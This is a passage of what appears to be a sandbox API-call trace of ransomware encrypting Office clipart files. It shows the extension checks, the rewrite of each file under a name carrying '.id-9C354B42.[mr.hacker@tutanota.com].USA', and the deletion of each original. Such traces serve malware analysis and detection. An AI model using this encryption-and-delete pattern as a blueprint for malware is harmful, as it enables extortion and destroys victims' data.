Office\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01639_.wmf")) returned 1 [0267.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0267.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0267.153] lstrlenW (lpString=".doc") returned 4 [0267.153] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.153] lstrlenW (lpString=".docx") returned 5 [0267.153] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0267.153] lstrlenW (lpString=".pdf") returned 4 [0267.153] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.153] lstrlenW (lpString=".xls") returned 4 [0267.153] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.153] lstrlenW (lpString=".xlsx") returned 5 [0267.153] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0267.153] lstrlenW (lpString=".ppt") returned 4 [0267.153] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0267.153] lstrlenW (lpString=".zip") returned 4 [0267.153] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.153] lstrlenW (lpString=".rar") returned 4 [0267.153] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.153] lstrlenW (lpString=".bz2") returned 4 [0267.153] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.153] lstrlenW (lpString=".7z") returned 3 [0267.153] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0267.153] lstrlenW (lpString=".dbf") returned 4 [0267.153] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0267.153] lstrlenW (lpString=".1cd") returned 4 [0267.153] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0267.154] lstrlenW (lpString=".jpg") returned 4 [0267.154] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0267.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0267.154] lstrlenW (lpString=".doc") returned 4 [0267.154] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.154] lstrlenW (lpString=".docx") returned 5 [0267.154] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0267.154] lstrlenW (lpString=".pdf") returned 4 [0267.154] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.154] lstrlenW (lpString=".xls") returned 4 [0267.154] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.154] lstrlenW (lpString=".xlsx") returned 5 [0267.154] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0267.154] lstrlenW (lpString=".ppt") returned 4 [0267.154] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.154] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0267.154] lstrlenW (lpString=".zip") returned 4 [0267.154] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.265] lstrlenW (lpString=".rar") returned 4 [0267.265] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.265] lstrlenW (lpString=".bz2") returned 4 [0267.265] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.265] lstrlenW (lpString=".7z") returned 3 [0267.266] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0267.266] lstrlenW (lpString=".dbf") returned 4 [0267.266] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0267.266] lstrlenW (lpString=".1cd") returned 4 [0267.266] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 63 [0267.266] lstrlenW (lpString=".jpg") returned 4 [0267.266] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.266] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0267.266] lstrlenW (lpString="CLASSIC1.WMF") returned 12 [0267.266] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0267.555] GetFileSizeEx (in: hFile=0x384, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=2422) returned 1 [0267.555] CloseHandle (hObject=0x384) returned 1 [0267.555] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf")) returned 0x20 [0267.562] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.563] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.563] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0267.563] GetLastError () returned 0x0 [0267.563] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x976, lpOverlapped=0x0) returned 1 [0267.564] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x980, lpOverlapped=0x0) returned 1 [0267.565] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.565] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xec, lpOverlapped=0x0) returned 1 [0267.565] SetEndOfFile (hFile=0x2bc) returned 1 [0267.565] CloseHandle (hObject=0x2bc) returned 1 [0267.565] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.565] SetEndOfFile (hFile=0x328) returned 1 [0267.568] CloseHandle (hObject=0x328) returned 1 [0267.568] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.568] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\classic1.wmf")) returned 1 [0267.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0267.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0267.569] lstrlenW (lpString=".doc") returned 4 [0267.569] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.569] lstrlenW (lpString=".docx") returned 5 [0267.569] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0267.569] lstrlenW (lpString=".pdf") returned 4 [0267.569] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.569] lstrlenW (lpString=".xls") returned 4 [0267.569] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.569] lstrlenW (lpString=".xlsx") returned 5 [0267.569] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0267.569] lstrlenW (lpString=".ppt") returned 4 [0267.569] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0267.569] lstrlenW (lpString=".zip") returned 4 [0267.569] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.569] lstrlenW (lpString=".rar") returned 4 [0267.569] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.569] lstrlenW (lpString=".bz2") returned 4 [0267.569] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.569] lstrlenW (lpString=".7z") returned 3 [0267.569] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0267.569] lstrlenW (lpString=".dbf") returned 4 [0267.569] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.569] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0267.569] lstrlenW (lpString=".1cd") returned 4 [0267.569] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0267.570] lstrlenW (lpString=".jpg") returned 4 [0267.570] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0267.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0267.570] lstrlenW (lpString=".doc") returned 4 [0267.570] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.570] lstrlenW (lpString=".docx") returned 5 [0267.570] lstrcmpiW (lpString1=".docx", lpString2="1.WMF") returned -1 [0267.570] lstrlenW (lpString=".pdf") returned 4 [0267.570] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.570] lstrlenW (lpString=".xls") returned 4 [0267.570] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.570] lstrlenW (lpString=".xlsx") returned 5 [0267.570] lstrcmpiW (lpString1=".xlsx", lpString2="1.WMF") returned -1 [0267.570] lstrlenW (lpString=".ppt") returned 4 [0267.570] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0267.570] lstrlenW (lpString=".zip") returned 4 [0267.570] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.570] lstrlenW (lpString=".rar") returned 4 [0267.570] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.570] lstrlenW (lpString=".bz2") returned 4 [0267.570] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.570] lstrlenW (lpString=".7z") returned 3 [0267.570] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.570] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0267.570] lstrlenW (lpString=".dbf") returned 4 [0267.571] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0267.571] lstrlenW (lpString=".1cd") returned 4 [0267.571] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.571] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 63 [0267.571] lstrlenW (lpString=".jpg") returned 4 [0267.571] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.571] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0267.571] lstrlenW (lpString="CLIP.WMF") returned 8 [0267.571] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.572] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=2262) returned 1 [0267.572] CloseHandle (hObject=0x328) returned 1 [0267.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf")) returned 0x20 [0267.572] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.572] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.572] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0267.575] GetLastError () returned 0x0 [0267.575] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x8d6, lpOverlapped=0x0) returned 1 [0267.576] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x8e0, lpOverlapped=0x0) returned 1 [0267.577] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.577] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xe4, lpOverlapped=0x0) returned 1 [0267.577] SetEndOfFile (hFile=0x2bc) returned 1 [0267.577] CloseHandle (hObject=0x2bc) returned 1 [0267.577] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.578] SetEndOfFile (hFile=0x328) returned 1 [0267.580] CloseHandle (hObject=0x328) returned 1 [0267.580] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.580] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\clip.wmf")) returned 1 [0267.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0267.580] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0267.580] lstrlenW (lpString=".doc") returned 4 [0267.580] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.580] lstrlenW (lpString=".docx") returned 5 [0267.580] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0267.580] lstrlenW (lpString=".pdf") returned 4 [0267.581] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.581] lstrlenW (lpString=".xls") returned 4 [0267.581] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.581] lstrlenW (lpString=".xlsx") returned 5 [0267.581] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0267.581] lstrlenW (lpString=".ppt") returned 4 [0267.581] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0267.581] lstrlenW (lpString=".zip") returned 4 [0267.581] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.581] lstrlenW (lpString=".rar") returned 4 [0267.581] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.581] lstrlenW (lpString=".bz2") returned 4 [0267.581] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.581] lstrlenW (lpString=".7z") returned 3 [0267.581] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0267.581] lstrlenW (lpString=".dbf") returned 4 [0267.581] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0267.581] lstrlenW (lpString=".1cd") returned 4 [0267.581] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0267.581] lstrlenW (lpString=".jpg") returned 4 [0267.581] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0267.581] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0267.581] lstrlenW (lpString=".doc") returned 4 [0267.582] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.582] lstrlenW (lpString=".docx") returned 5 [0267.582] lstrcmpiW (lpString1=".docx", lpString2="P.WMF") returned -1 [0267.582] lstrlenW (lpString=".pdf") returned 4 [0267.582] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.582] lstrlenW (lpString=".xls") returned 4 [0267.582] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0267.582] lstrlenW (lpString=".xlsx") returned 5 [0267.582] lstrcmpiW (lpString1=".xlsx", lpString2="P.WMF") returned -1 [0267.582] lstrlenW (lpString=".ppt") returned 4 [0267.582] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0267.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0267.582] lstrlenW (lpString=".zip") returned 4 [0267.582] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0267.582] lstrlenW (lpString=".rar") returned 4 [0267.582] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0267.582] lstrlenW (lpString=".bz2") returned 4 [0267.582] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0267.582] lstrlenW (lpString=".7z") returned 3 [0267.582] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0267.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0267.582] lstrlenW (lpString=".dbf") returned 4 [0267.582] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0267.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0267.582] lstrlenW (lpString=".1cd") returned 4 [0267.582] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0267.582] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CLIP.WMF") returned 59 [0267.582] lstrlenW (lpString=".jpg") returned 4 [0267.582] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0267.583] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0267.583] lstrlenW (lpString="CRANE.WMF") returned 9 [0267.583] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.584] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x2d3ff1c | out: lpFileSize=0x2d3ff1c*=5270) returned 1 [0267.584] CloseHandle (hObject=0x328) returned 1 [0267.584] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf")) returned 0x20 [0267.584] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0267.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0267.584] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.584] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.584] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0267.584] GetLastError () returned 0x0 [0267.584] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x1496, lpOverlapped=0x0) returned 1 [0267.586] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0x14a0, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0x14a0, lpOverlapped=0x0) returned 1 [0267.587] ReadFile (in: hFile=0x328, lpBuffer=0x3100020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d3fed4, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesRead=0x2d3fed4*=0x0, lpOverlapped=0x0) returned 1 [0267.587] WriteFile (in: hFile=0x2bc, lpBuffer=0x3100020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2d3fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3100020*, lpNumberOfBytesWritten=0x2d3fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0267.587] SetEndOfFile (hFile=0x2bc) returned 1 [0267.587] CloseHandle (hObject=0x2bc) returned 1 [0267.587] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d3fec8 | out: lpNewFilePointer=0x0) returned 1 [0267.587] SetEndOfFile (hFile=0x328) returned 1 [0267.590] CloseHandle (hObject=0x328) returned 1 [0267.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0267.594] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\crane.wmf")) returned 1 [0267.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0267.594] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CRANE.WMF") returned 60 [0267.594] lstrlenW (lpString=".doc") returned 4 [0267.594] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0267.594] lstrlenW (lpString=".docx") returned 5 [0267.595] lstrcmpiW (lpString1=".docx", lpString2="E.WMF") returned -1 [0267.595] lstrlenW (lpString=".pdf") returned 4 [0267.595] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0267.595] lstrlenW (lpString=".xls") 